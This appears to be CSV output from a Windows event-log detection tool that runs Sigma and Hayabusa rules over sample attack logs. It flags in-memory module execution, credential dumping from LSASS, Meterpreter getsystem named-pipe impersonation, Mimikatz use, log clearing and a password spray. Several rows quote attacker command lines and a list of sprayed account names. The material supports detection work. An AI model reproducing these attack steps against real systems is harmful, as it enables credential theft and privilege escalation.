2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /all  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
